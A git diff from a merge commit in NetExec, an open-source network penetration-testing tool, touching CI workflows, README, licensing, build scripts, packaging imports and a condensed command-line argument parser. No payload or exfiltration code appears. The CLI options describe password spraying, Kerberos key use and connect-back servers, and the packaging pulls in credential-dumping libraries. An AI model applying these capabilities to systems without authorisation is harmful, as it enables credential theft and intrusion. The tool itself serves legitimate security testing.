Merging main into fgpp and resolving conflicts
commit
a869c6f5e8
|
@ -3,4 +3,4 @@
|
||||||
##########################################
|
##########################################
|
||||||
|
|
||||||
# default ownership:
|
# default ownership:
|
||||||
* @zblurx @Marshall-Hallenbeck @NeffIsBack
|
* @zblurx @Marshall-Hallenbeck @NeffIsBack @mpgn
|
|
@ -30,7 +30,7 @@ If applicable, add screenshots to help explain your problem.
|
||||||
|
|
||||||
**NetExec info**
|
**NetExec info**
|
||||||
- OS: [e.g. Kali]
|
- OS: [e.g. Kali]
|
||||||
- Version of nxc [e.g. v1.5.2]
|
- Version of nxc: [e.g. v1.5.2]
|
||||||
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
|
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
|
||||||
|
|
||||||
**Additional context**
|
**Additional context**
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
name: Lint Python code with ruff
|
||||||
|
# Caching source: https://gist.github.com/gh640/233a6daf68e9e937115371c0ecd39c61?permalink_comment_id=4529233#gistcomment-4529233
|
||||||
|
|
||||||
|
on: [push, pull_request]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
lint:
|
||||||
|
name: Lint Python code with ruff
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
if:
|
||||||
|
github.event_name == 'push' || github.event.pull_request.head.repo.full_name != github.repository
|
||||||
|
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v3
|
||||||
|
- name: Install poetry
|
||||||
|
run: |
|
||||||
|
pipx install poetry
|
||||||
|
- name: Set up Python
|
||||||
|
uses: actions/setup-python@v4
|
||||||
|
with:
|
||||||
|
python-version: 3.11
|
||||||
|
cache: poetry
|
||||||
|
cache-dependency-path: poetry.lock
|
||||||
|
- name: Install dependencies with dev group
|
||||||
|
run: |
|
||||||
|
poetry install --with dev
|
||||||
|
- name: Run ruff
|
||||||
|
run: |
|
||||||
|
poetry run ruff --version
|
||||||
|
poetry run ruff check . --preview
|
|
@ -9,13 +9,13 @@ jobs:
|
||||||
name: NetExec Tests for Py${{ matrix.python-version }}
|
name: NetExec Tests for Py${{ matrix.python-version }}
|
||||||
runs-on: ${{ matrix.os }}
|
runs-on: ${{ matrix.os }}
|
||||||
strategy:
|
strategy:
|
||||||
max-parallel: 4
|
max-parallel: 5
|
||||||
matrix:
|
matrix:
|
||||||
os: [ubuntu-latest]
|
os: [ubuntu-latest]
|
||||||
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
|
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v3
|
- uses: actions/checkout@v3
|
||||||
- name: NetExec tests on ${{ matrix.os }}
|
- name: NetExec set up python on ${{ matrix.os }}
|
||||||
uses: actions/setup-python@v4
|
uses: actions/setup-python@v4
|
||||||
with:
|
with:
|
||||||
python-version: ${{ matrix.python-version }}
|
python-version: ${{ matrix.python-version }}
|
|
@ -3,6 +3,7 @@ hash_spider_default.sqlite3
|
||||||
*.bak
|
*.bak
|
||||||
*.log
|
*.log
|
||||||
.venv
|
.venv
|
||||||
|
pyvenv.cfg
|
||||||
.vscode
|
.vscode
|
||||||
.idea
|
.idea
|
||||||
# Byte-compiled / optimized / DLL files
|
# Byte-compiled / optimized / DLL files
|
||||||
|
@ -57,9 +58,6 @@ coverage.xml
|
||||||
*.mo
|
*.mo
|
||||||
*.pot
|
*.pot
|
||||||
|
|
||||||
# Django stuff:
|
|
||||||
*.log
|
|
||||||
|
|
||||||
# Sphinx documentation
|
# Sphinx documentation
|
||||||
docs/_build/
|
docs/_build/
|
||||||
|
|
||||||
|
|
4
LICENSE
4
LICENSE
|
@ -1,5 +1,5 @@
|
||||||
Copyright (c) 2023, Marshall-Hallenbeck, NeffIsBack, zblurx
|
Copyright (c) 2023, Marshall-Hallenbeck, NeffIsBack, zblurx, mpgn_x64
|
||||||
Copyright (c) 2022, byt3bl33d3r, mpgn_x64
|
Copyright (c) 2022, byt3bl33d3r
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without
|
Redistribution and use in source and binary forms, with or without
|
||||||
|
|
14
README.md
14
README.md
|
@ -1,7 +1,8 @@
|
||||||
![Supported Python versions](https://img.shields.io/badge/python-3.7+-blue.svg)
|
![Supported Python versions](https://img.shields.io/badge/python-3.8+-blue.svg)
|
||||||
[![Twitter](https://img.shields.io/twitter/follow/al3xn3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)
|
[![Twitter](https://img.shields.io/twitter/follow/al3xn3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)
|
||||||
[![Twitter](https://img.shields.io/twitter/follow/_zblurx?label=_zblurx&style=social)](https://twitter.com/intent/follow?screen_name=_zblurx)
|
[![Twitter](https://img.shields.io/twitter/follow/_zblurx?label=_zblurx&style=social)](https://twitter.com/intent/follow?screen_name=_zblurx)
|
||||||
[![Twitter](https://img.shields.io/twitter/follow/MJHallenbeck?label=MJHallenbeck&style=social)](https://twitter.com/intent/follow?screen_name=MJHallenbeck)
|
[![Twitter](https://img.shields.io/twitter/follow/MJHallenbeck?label=MJHallenbeck&style=social)](https://twitter.com/intent/follow?screen_name=MJHallenbeck)
|
||||||
|
[![Twitter](https://img.shields.io/twitter/follow/mpgn_x64?label=mpgn_x64&style=social)](https://twitter.com/intent/follow?screen_name=mpgn_x64)
|
||||||
|
|
||||||
|
|
||||||
🚩 This is the open source repository of NetExec maintained by a community of passionate people
|
🚩 This is the open source repository of NetExec maintained by a community of passionate people
|
||||||
|
@ -9,7 +10,7 @@
|
||||||
|
|
||||||
This project was initially created in 2015 by @byt3bl33d3r, known as CrackMapExec. In 2019 @mpgn_x64 started maintaining the project for the next 4 years, adding a lot of great tools and features. In September 2023 he retired from maintaining the project.
|
This project was initially created in 2015 by @byt3bl33d3r, known as CrackMapExec. In 2019 @mpgn_x64 started maintaining the project for the next 4 years, adding a lot of great tools and features. In September 2023 he retired from maintaining the project.
|
||||||
|
|
||||||
Along with many other contributers, we (NeffIsBack, Marshall-Hallenbeck, and zblurx) developed new features, bugfixes, and helped maintain the original project CrackMapExec.
|
Along with many other contributors, we (NeffIsBack, Marshall-Hallenbeck, and zblurx) developed new features, bug fixes, and helped maintain the original project CrackMapExec.
|
||||||
During this time, with both a private and public repository, community contributions were not easily merged into the project. The 6-8 month discrepancy between the code bases caused many development issues and heavily reduced community-driven development.
|
During this time, with both a private and public repository, community contributions were not easily merged into the project. The 6-8 month discrepancy between the code bases caused many development issues and heavily reduced community-driven development.
|
||||||
With the end of mpgn's maintainer role, we (the remaining most active contributors) decided to maintain the project together as a fully free and open source project under the new name **NetExec** 🚀
|
With the end of mpgn's maintainer role, we (the remaining most active contributors) decided to maintain the project together as a fully free and open source project under the new name **NetExec** 🚀
|
||||||
Going forward, our intent is to maintain a community-driven and maintained project with regular updates for everyone to use.
|
Going forward, our intent is to maintain a community-driven and maintained project with regular updates for everyone to use.
|
||||||
|
@ -20,7 +21,7 @@ Going forward, our intent is to maintain a community-driven and maintained proje
|
||||||
|
|
||||||
You are on the **latest up-to-date** repository of the project NetExec (nxc) ! 🎉
|
You are on the **latest up-to-date** repository of the project NetExec (nxc) ! 🎉
|
||||||
|
|
||||||
- 🚧 If you want to report a problem, open un [Issue](https://github.com/Pennyw0rth/NetExec/issues)
|
- 🚧 If you want to report a problem, open an [Issue](https://github.com/Pennyw0rth/NetExec/issues)
|
||||||
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/Pennyw0rth/NetExec/pulls)
|
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/Pennyw0rth/NetExec/pulls)
|
||||||
- 💬 If you want to discuss, open a [Discussion](https://github.com/Pennyw0rth/NetExec/discussions)
|
- 💬 If you want to discuss, open a [Discussion](https://github.com/Pennyw0rth/NetExec/discussions)
|
||||||
|
|
||||||
|
@ -36,6 +37,12 @@ See the project's [wiki](https://netexec.wiki/) (in development) for documentati
|
||||||
# Installation
|
# Installation
|
||||||
Please see the installation instructions on the [wiki](https://netexec.wiki/getting-started/installation) (in development)
|
Please see the installation instructions on the [wiki](https://netexec.wiki/getting-started/installation) (in development)
|
||||||
|
|
||||||
|
## Linux
|
||||||
|
```
|
||||||
|
sudo apt install pipx git
|
||||||
|
pipx ensurepath
|
||||||
|
pipx install git+https://github.com/Pennyw0rth/NetExec
|
||||||
|
```
|
||||||
# Development
|
# Development
|
||||||
Development guidelines and recommendations in development
|
Development guidelines and recommendations in development
|
||||||
|
|
||||||
|
@ -50,3 +57,4 @@ Awesome code contributors of NetExec:
|
||||||
[![](https://github.com/zblurx.png?size=50)](https://github.com/zblurx)
|
[![](https://github.com/zblurx.png?size=50)](https://github.com/zblurx)
|
||||||
[![](https://github.com/NeffIsBack.png?size=50)](https://github.com/NeffIsBack)
|
[![](https://github.com/NeffIsBack.png?size=50)](https://github.com/NeffIsBack)
|
||||||
[![](https://github.com/Hackndo.png?size=50)](https://github.com/Hackndo)
|
[![](https://github.com/Hackndo.png?size=50)](https://github.com/Hackndo)
|
||||||
|
[![](https://github.com/XiaoliChan.png?size=50)](https://github.com/XiaoliChan)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess
|
import subprocess
|
||||||
|
@ -11,27 +8,26 @@ from pathlib import Path
|
||||||
|
|
||||||
from shiv.bootstrap import Environment
|
from shiv.bootstrap import Environment
|
||||||
|
|
||||||
# from distutils.ccompiler import new_compiler
|
|
||||||
from shiv.builder import create_archive
|
from shiv.builder import create_archive
|
||||||
from shiv.cli import __version__ as VERSION
|
from shiv.cli import __version__ as VERSION
|
||||||
|
|
||||||
|
|
||||||
def build_nxc():
|
def build_nxc():
|
||||||
print("building nxc")
|
print("Building nxc")
|
||||||
try:
|
try:
|
||||||
shutil.rmtree("bin")
|
shutil.rmtree("bin")
|
||||||
shutil.rmtree("build")
|
shutil.rmtree("build")
|
||||||
except Exception as e:
|
except FileNotFoundError:
|
||||||
pass
|
pass
|
||||||
|
except Exception as e:
|
||||||
|
print(f"Exception while removing bin & build: {e}")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
print("remove useless files")
|
|
||||||
os.mkdir("build")
|
os.mkdir("build")
|
||||||
os.mkdir("bin")
|
os.mkdir("bin")
|
||||||
shutil.copytree("nxc", "build/nxc")
|
shutil.copytree("nxc", "build/nxc")
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print(e)
|
print(f"Exception while creating bin and build directories: {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
subprocess.run(
|
subprocess.run(
|
||||||
|
@ -48,7 +44,6 @@ def build_nxc():
|
||||||
check=True,
|
check=True,
|
||||||
)
|
)
|
||||||
|
|
||||||
# [shutil.rmtree(p) for p in Path("build").glob("**/__pycache__")]
|
|
||||||
[shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]
|
[shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]
|
||||||
|
|
||||||
env = Environment(
|
env = Environment(
|
||||||
|
@ -93,7 +88,7 @@ if __name__ == "__main__":
|
||||||
try:
|
try:
|
||||||
build_nxc()
|
build_nxc()
|
||||||
build_nxcdb()
|
build_nxcdb()
|
||||||
except:
|
except FileNotFoundError:
|
||||||
pass
|
pass
|
||||||
finally:
|
finally:
|
||||||
shutil.rmtree("build")
|
shutil.rmtree("build")
|
||||||
|
|
92
flake.lock
92
flake.lock
|
@ -1,92 +0,0 @@
|
||||||
{
|
|
||||||
"nodes": {
|
|
||||||
"flake-utils": {
|
|
||||||
"locked": {
|
|
||||||
"lastModified": 1649676176,
|
|
||||||
"narHash": "sha256-OWKJratjt2RW151VUlJPRALb7OU2S5s+f0vLj4o1bHM=",
|
|
||||||
"owner": "numtide",
|
|
||||||
"repo": "flake-utils",
|
|
||||||
"rev": "a4b154ebbdc88c8498a5c7b01589addc9e9cb678",
|
|
||||||
"type": "github"
|
|
||||||
},
|
|
||||||
"original": {
|
|
||||||
"owner": "numtide",
|
|
||||||
"repo": "flake-utils",
|
|
||||||
"type": "github"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"flake-utils_2": {
|
|
||||||
"locked": {
|
|
||||||
"lastModified": 1649676176,
|
|
||||||
"narHash": "sha256-OWKJratjt2RW151VUlJPRALb7OU2S5s+f0vLj4o1bHM=",
|
|
||||||
"owner": "numtide",
|
|
||||||
"repo": "flake-utils",
|
|
||||||
"rev": "a4b154ebbdc88c8498a5c7b01589addc9e9cb678",
|
|
||||||
"type": "github"
|
|
||||||
},
|
|
||||||
"original": {
|
|
||||||
"owner": "numtide",
|
|
||||||
"repo": "flake-utils",
|
|
||||||
"type": "github"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"nixpkgs": {
|
|
||||||
"locked": {
|
|
||||||
"lastModified": 1651248272,
|
|
||||||
"narHash": "sha256-rMqS47Q53lZQDDwrFgLnWI5E+GaalVt4uJfIciv140U=",
|
|
||||||
"owner": "NixOS",
|
|
||||||
"repo": "nixpkgs",
|
|
||||||
"rev": "8758d58df0798db2b29484739ca7303220a739d3",
|
|
||||||
"type": "github"
|
|
||||||
},
|
|
||||||
"original": {
|
|
||||||
"owner": "NixOS",
|
|
||||||
"repo": "nixpkgs",
|
|
||||||
"type": "github"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"nixpkgs_2": {
|
|
||||||
"locked": {
|
|
||||||
"lastModified": 1651248272,
|
|
||||||
"narHash": "sha256-rMqS47Q53lZQDDwrFgLnWI5E+GaalVt4uJfIciv140U=",
|
|
||||||
"owner": "NixOS",
|
|
||||||
"repo": "nixpkgs",
|
|
||||||
"rev": "8758d58df0798db2b29484739ca7303220a739d3",
|
|
||||||
"type": "github"
|
|
||||||
},
|
|
||||||
"original": {
|
|
||||||
"owner": "NixOS",
|
|
||||||
"repo": "nixpkgs",
|
|
||||||
"type": "github"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"poetry2nix": {
|
|
||||||
"inputs": {
|
|
||||||
"flake-utils": "flake-utils_2",
|
|
||||||
"nixpkgs": "nixpkgs_2"
|
|
||||||
},
|
|
||||||
"locked": {
|
|
||||||
"lastModified": 1651165059,
|
|
||||||
"narHash": "sha256-/psJg8NsEa00bVVsXiRUM8yL/qfu05zPZ+jJzm7hRTo=",
|
|
||||||
"owner": "nix-community",
|
|
||||||
"repo": "poetry2nix",
|
|
||||||
"rev": "ece2a41612347a4fe537d8c0a25fe5d8254835bd",
|
|
||||||
"type": "github"
|
|
||||||
},
|
|
||||||
"original": {
|
|
||||||
"owner": "nix-community",
|
|
||||||
"repo": "poetry2nix",
|
|
||||||
"type": "github"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"root": {
|
|
||||||
"inputs": {
|
|
||||||
"flake-utils": "flake-utils",
|
|
||||||
"nixpkgs": "nixpkgs",
|
|
||||||
"poetry2nix": "poetry2nix"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"root": "root",
|
|
||||||
"version": 7
|
|
||||||
}
|
|
36
flake.nix
36
flake.nix
|
@ -1,36 +0,0 @@
|
||||||
{
|
|
||||||
description = "Application packaged using poetry2nix";
|
|
||||||
|
|
||||||
inputs.flake-utils.url = "github:numtide/flake-utils";
|
|
||||||
inputs.nixpkgs.url = "github:NixOS/nixpkgs";
|
|
||||||
inputs.poetry2nix.url = "github:nix-community/poetry2nix";
|
|
||||||
|
|
||||||
outputs = { self, nixpkgs, flake-utils, poetry2nix }:
|
|
||||||
{
|
|
||||||
# Nixpkgs overlay providing the application
|
|
||||||
overlay = nixpkgs.lib.composeManyExtensions [
|
|
||||||
poetry2nix.overlay
|
|
||||||
(final: prev: {
|
|
||||||
# The application
|
|
||||||
NetExec = prev.poetry2nix.mkPoetryApplication {
|
|
||||||
projectDir = ./.;
|
|
||||||
};
|
|
||||||
})
|
|
||||||
];
|
|
||||||
} // (flake-utils.lib.eachDefaultSystem (system:
|
|
||||||
let
|
|
||||||
pkgs = import nixpkgs {
|
|
||||||
inherit system;
|
|
||||||
overlays = [ self.overlay ];
|
|
||||||
};
|
|
||||||
in
|
|
||||||
{
|
|
||||||
apps = {
|
|
||||||
NetExec = pkgs.NetExec;
|
|
||||||
};
|
|
||||||
|
|
||||||
defaultApp = pkgs.NetExec;
|
|
||||||
|
|
||||||
packages = { NetExec = pkgs.NetExec; };
|
|
||||||
}));
|
|
||||||
}
|
|
|
@ -13,6 +13,12 @@ a = Analysis(
|
||||||
('./nxc/modules', 'nxc/modules')
|
('./nxc/modules', 'nxc/modules')
|
||||||
],
|
],
|
||||||
hiddenimports=[
|
hiddenimports=[
|
||||||
|
'aardwolf',
|
||||||
|
'aardwolf.connection',
|
||||||
|
'aardwolf.commons.queuedata.constants',
|
||||||
|
'aardwolf.commons.iosettings',
|
||||||
|
'aardwolf.commons.target',
|
||||||
|
'aardwolf.protocol.x224.constants',
|
||||||
'impacket.examples.secretsdump',
|
'impacket.examples.secretsdump',
|
||||||
'impacket.dcerpc.v5.lsat',
|
'impacket.dcerpc.v5.lsat',
|
||||||
'impacket.dcerpc.v5.transport',
|
'impacket.dcerpc.v5.transport',
|
||||||
|
@ -48,6 +54,7 @@ a = Analysis(
|
||||||
'lsassy.parser',
|
'lsassy.parser',
|
||||||
'lsassy.session',
|
'lsassy.session',
|
||||||
'lsassy.impacketfile',
|
'lsassy.impacketfile',
|
||||||
|
'bloodhound',
|
||||||
'dns',
|
'dns',
|
||||||
'dns.name',
|
'dns.name',
|
||||||
'dns.resolver',
|
'dns.resolver',
|
||||||
|
@ -64,6 +71,7 @@ a = Analysis(
|
||||||
'dploot.lib.smb',
|
'dploot.lib.smb',
|
||||||
'pyasn1_modules.rfc5652',
|
'pyasn1_modules.rfc5652',
|
||||||
'unicrypto.backends.pycryptodomex',
|
'unicrypto.backends.pycryptodomex',
|
||||||
|
'sspilib.raw._text',
|
||||||
],
|
],
|
||||||
hookspath=['./nxc/.hooks'],
|
hookspath=['./nxc/.hooks'],
|
||||||
runtime_hooks=[],
|
runtime_hooks=[],
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from PyInstaller.utils.hooks import collect_all
|
from PyInstaller.utils.hooks import collect_all
|
||||||
|
|
||||||
datas, binaries, hiddenimports = collect_all("lsassy")
|
datas, binaries, hiddenimports = collect_all("lsassy")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from PyInstaller.utils.hooks import collect_all
|
from PyInstaller.utils.hooks import collect_all
|
||||||
|
|
||||||
datas, binaries, hiddenimports = collect_all("pypykatz")
|
datas, binaries, hiddenimports = collect_all("pypykatz")
|
||||||
|
|
196
nxc/cli.py
196
nxc/cli.py
|
@ -1,25 +1,27 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import argparse
|
import argparse
|
||||||
|
import argcomplete
|
||||||
import sys
|
import sys
|
||||||
from argparse import RawTextHelpFormatter
|
from argparse import RawTextHelpFormatter
|
||||||
|
from os import listdir
|
||||||
|
from os.path import dirname
|
||||||
|
from os.path import join as path_join
|
||||||
|
import nxc
|
||||||
|
from nxc.paths import NXC_PATH
|
||||||
from nxc.loaders.protocolloader import ProtocolLoader
|
from nxc.loaders.protocolloader import ProtocolLoader
|
||||||
from nxc.helpers.logger import highlight
|
from nxc.helpers.logger import highlight
|
||||||
from termcolor import colored
|
|
||||||
from nxc.logger import nxc_logger
|
from nxc.logger import nxc_logger
|
||||||
import importlib.metadata
|
import importlib.metadata
|
||||||
|
|
||||||
|
|
||||||
def gen_cli_args():
|
def gen_cli_args():
|
||||||
VERSION = importlib.metadata.version("netexec")
|
VERSION = importlib.metadata.version("netexec")
|
||||||
CODENAME = "A New Beginning"
|
CODENAME = "nxc4u"
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description=f"""
|
parser = argparse.ArgumentParser(description=rf"""
|
||||||
. .
|
. .
|
||||||
.| |. _ _ _ _____
|
.| |. _ _ _ _____
|
||||||
|| || | \ | | ___ | |_ | ____| __ __ ___ ___
|
|| || | \ | | ___ | |_ | ____| __ __ ___ ___
|
||||||
\\\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
|
\\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
|
||||||
.=[ ]=. | |\ | | __/ | |_ | |___ > < | __/ | (__
|
.=[ ]=. | |\ | | __/ | |_ | |___ > < | __/ | (__
|
||||||
/ /ॱ-ॱ\ \ |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
|
/ /ॱ-ॱ\ \ |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
|
||||||
ॱ \ / ॱ
|
ॱ \ / ॱ
|
||||||
|
@ -32,34 +34,12 @@ def gen_cli_args():
|
||||||
|
|
||||||
{highlight('Version', 'red')} : {highlight(VERSION)}
|
{highlight('Version', 'red')} : {highlight(VERSION)}
|
||||||
{highlight('Codename', 'red')}: {highlight(CODENAME)}
|
{highlight('Codename', 'red')}: {highlight(CODENAME)}
|
||||||
""",
|
""", formatter_class=RawTextHelpFormatter)
|
||||||
formatter_class=RawTextHelpFormatter,
|
|
||||||
)
|
|
||||||
|
|
||||||
parser.add_argument(
|
parser.add_argument("-t", type=int, dest="threads", default=100, help="set how many concurrent threads to use (default: 100)")
|
||||||
"-t",
|
parser.add_argument("--timeout", default=None, type=int, help="max timeout in seconds of each thread (default: None)")
|
||||||
type=int,
|
parser.add_argument("--jitter", metavar="INTERVAL", type=str, help="sets a random delay between each connection (default: None)")
|
||||||
dest="threads",
|
parser.add_argument("--no-progress", action="store_true", help="Not displaying progress bar during scan")
|
||||||
default=100,
|
|
||||||
help="set how many concurrent threads to use (default: 100)",
|
|
||||||
)
|
|
||||||
parser.add_argument(
|
|
||||||
"--timeout",
|
|
||||||
default=None,
|
|
||||||
type=int,
|
|
||||||
help="max timeout in seconds of each thread (default: None)",
|
|
||||||
)
|
|
||||||
parser.add_argument(
|
|
||||||
"--jitter",
|
|
||||||
metavar="INTERVAL",
|
|
||||||
type=str,
|
|
||||||
help="sets a random delay between each connection (default: None)",
|
|
||||||
)
|
|
||||||
parser.add_argument(
|
|
||||||
"--no-progress",
|
|
||||||
action="store_true",
|
|
||||||
help="Not displaying progress bar during scan",
|
|
||||||
)
|
|
||||||
parser.add_argument("--verbose", action="store_true", help="enable verbose output")
|
parser.add_argument("--verbose", action="store_true", help="enable verbose output")
|
||||||
parser.add_argument("--debug", action="store_true", help="enable debug level information")
|
parser.add_argument("--debug", action="store_true", help="enable debug level information")
|
||||||
parser.add_argument("--version", action="store_true", help="Display nxc version")
|
parser.add_argument("--version", action="store_true", help="Display nxc version")
|
||||||
|
@ -67,142 +47,68 @@ def gen_cli_args():
|
||||||
# we do module arg parsing here so we can reference the module_list attribute below
|
# we do module arg parsing here so we can reference the module_list attribute below
|
||||||
module_parser = argparse.ArgumentParser(add_help=False)
|
module_parser = argparse.ArgumentParser(add_help=False)
|
||||||
mgroup = module_parser.add_mutually_exclusive_group()
|
mgroup = module_parser.add_mutually_exclusive_group()
|
||||||
mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
|
mgroup.add_argument("-M", "--module", choices=get_module_names(), action="append", metavar="MODULE", help="module to use")
|
||||||
module_parser.add_argument(
|
module_parser.add_argument("-o", metavar="MODULE_OPTION", nargs="+", default=[], dest="module_options", help="module options")
|
||||||
"-o",
|
|
||||||
metavar="MODULE_OPTION",
|
|
||||||
nargs="+",
|
|
||||||
default=[],
|
|
||||||
dest="module_options",
|
|
||||||
help="module options",
|
|
||||||
)
|
|
||||||
module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
|
module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
|
||||||
module_parser.add_argument(
|
module_parser.add_argument("--options", dest="show_module_options", action="store_true", help="display module options")
|
||||||
"--options",
|
module_parser.add_argument("--server", choices={"http", "https"}, default="https", help="use the selected server (default: https)")
|
||||||
dest="show_module_options",
|
module_parser.add_argument("--server-host", type=str, default="0.0.0.0", metavar="HOST", help="IP to bind the server to (default: 0.0.0.0)")
|
||||||
action="store_true",
|
module_parser.add_argument("--server-port", metavar="PORT", type=int, help="start the server on the specified port")
|
||||||
help="display module options",
|
module_parser.add_argument("--connectback-host", type=str, metavar="CHOST", help="IP for the remote system to connect back to (default: same as server-host)")
|
||||||
)
|
|
||||||
module_parser.add_argument(
|
|
||||||
"--server",
|
|
||||||
choices={"http", "https"},
|
|
||||||
default="https",
|
|
||||||
help="use the selected server (default: https)",
|
|
||||||
)
|
|
||||||
module_parser.add_argument(
|
|
||||||
"--server-host",
|
|
||||||
type=str,
|
|
||||||
default="0.0.0.0",
|
|
||||||
metavar="HOST",
|
|
||||||
help="IP to bind the server to (default: 0.0.0.0)",
|
|
||||||
)
|
|
||||||
module_parser.add_argument(
|
|
||||||
"--server-port",
|
|
||||||
metavar="PORT",
|
|
||||||
type=int,
|
|
||||||
help="start the server on the specified port",
|
|
||||||
)
|
|
||||||
module_parser.add_argument(
|
|
||||||
"--connectback-host",
|
|
||||||
type=str,
|
|
||||||
metavar="CHOST",
|
|
||||||
help="IP for the remote system to connect back to (default: same as server-host)",
|
|
||||||
)
|
|
||||||
|
|
||||||
subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")
|
subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")
|
||||||
|
|
||||||
std_parser = argparse.ArgumentParser(add_help=False)
|
std_parser = argparse.ArgumentParser(add_help=False)
|
||||||
std_parser.add_argument(
|
std_parser.add_argument("target", nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*", type=str, help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)")
|
||||||
"target",
|
std_parser.add_argument("-id", metavar="CRED_ID", nargs="+", default=[], type=str, dest="cred_id", help="database credential ID(s) to use for authentication")
|
||||||
nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*",
|
std_parser.add_argument("-u", metavar="USERNAME", dest="username", nargs="+", default=[], help="username(s) or file(s) containing usernames")
|
||||||
type=str,
|
std_parser.add_argument("-p", metavar="PASSWORD", dest="password", nargs="+", default=[], help="password(s) or file(s) containing passwords")
|
||||||
help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)",
|
|
||||||
)
|
|
||||||
std_parser.add_argument(
|
|
||||||
"-id",
|
|
||||||
metavar="CRED_ID",
|
|
||||||
nargs="+",
|
|
||||||
default=[],
|
|
||||||
type=str,
|
|
||||||
dest="cred_id",
|
|
||||||
help="database credential ID(s) to use for authentication",
|
|
||||||
)
|
|
||||||
std_parser.add_argument(
|
|
||||||
"-u",
|
|
||||||
metavar="USERNAME",
|
|
||||||
dest="username",
|
|
||||||
nargs="+",
|
|
||||||
default=[],
|
|
||||||
help="username(s) or file(s) containing usernames",
|
|
||||||
)
|
|
||||||
std_parser.add_argument(
|
|
||||||
"-p",
|
|
||||||
metavar="PASSWORD",
|
|
||||||
dest="password",
|
|
||||||
nargs="+",
|
|
||||||
default=[],
|
|
||||||
help="password(s) or file(s) containing passwords",
|
|
||||||
)
|
|
||||||
std_parser.add_argument("--ignore-pw-decoding", action="store_true", help="Ignore non UTF-8 characters when decoding the password file")
|
std_parser.add_argument("--ignore-pw-decoding", action="store_true", help="Ignore non UTF-8 characters when decoding the password file")
|
||||||
std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
|
std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
|
||||||
std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
|
std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
|
||||||
std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
|
std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
|
||||||
std_parser.add_argument(
|
std_parser.add_argument("--use-kcache", action="store_true", help="Use Kerberos authentication from ccache file (KRB5CCNAME)")
|
||||||
"--use-kcache",
|
|
||||||
action="store_true",
|
|
||||||
help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
|
|
||||||
)
|
|
||||||
std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
|
std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
|
||||||
std_parser.add_argument(
|
std_parser.add_argument("--aesKey", metavar="AESKEY", nargs="+", help="AES key to use for Kerberos Authentication (128 or 256 bits)")
|
||||||
"--aesKey",
|
std_parser.add_argument("--kdcHost", metavar="KDCHOST", help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
|
||||||
metavar="AESKEY",
|
|
||||||
nargs="+",
|
|
||||||
help="AES key to use for Kerberos Authentication (128 or 256 bits)",
|
|
||||||
)
|
|
||||||
std_parser.add_argument(
|
|
||||||
"--kdcHost",
|
|
||||||
metavar="KDCHOST",
|
|
||||||
